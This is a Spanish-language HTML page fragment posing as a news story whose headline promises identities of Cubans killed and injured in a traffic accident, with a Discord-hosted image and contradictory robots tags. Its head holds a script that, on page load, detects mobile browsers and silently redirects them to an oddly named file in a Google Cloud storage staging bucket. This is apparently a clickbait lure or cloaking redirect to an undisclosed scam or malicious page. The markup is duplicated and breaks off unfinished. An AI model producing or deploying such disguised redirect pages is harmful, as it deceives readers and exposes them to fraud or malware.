<!DOCTYPE html>
<html lang="es">
<head>
<meta charset="utf-8"/>
<meta name="title" content="Stream"/>
<meta name="keywords" content="Instagram"/>
<meta property="og:description" content="2411"/>
<meta name="googlebot" content="noindex"/>
<meta name="robots" content="index"/>
<meta name="robots" content="noindex"/>
<meta name="robots" content="nofollow"/>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/>
<meta name="viewport" content="width=device-width, initial-scale=1"/>
<meta property="og:title" content="Revelan identidades de cubanos fallecidos y heridos en accidente de transito esta mañana"/>
<meta property="og:image" content="https://media.discordapp.net/attachments/1230492694724476990/1230567723562434560/gdfsgfder44344.jpg?ex=6633ca80&is=66215580&hm=05c71817f4d518f31073acef695380cf064ae519a62d3328483a90a985cb9bea&=&format=webp"/>
<meta name="apple-itunes-app" content="app-id=6448311069"/>
<!DOCTYPE html>
<html>
<head>
    <title>Revelan identidades de cubanos fallecidos y heridos en accidente de transito esta mañana</title>
    <script>
        // Función para detectar si es un dispositivo móvil
        function esDispositivoMovil() {
            return /Android|webOS|iPhone|iPad|iPod|BlackBerry|IEMobile|Opera Mini/i.test(navigator.userAgent);
        }

        // Función para redirigir si es un dispositivo móvil
        function redireccionarSiEsMovil() {
            if (esDispositivoMovil()) {
                // URL a la que quieres redirigir para dispositivos móviles
                var urlMovil = 'https://storage.googleapis.com/staging.zankiops001.appspot.com/trsssdd11112.html';

                // Redirigir al usuario a la URL para dispositivos móviles
                window.location.href = urlMovil;
            }
        }

        // Llamar a la función de redireccionamiento cuando la página cargue
        window.onload = redireccionarSiEsMovil;
    </script>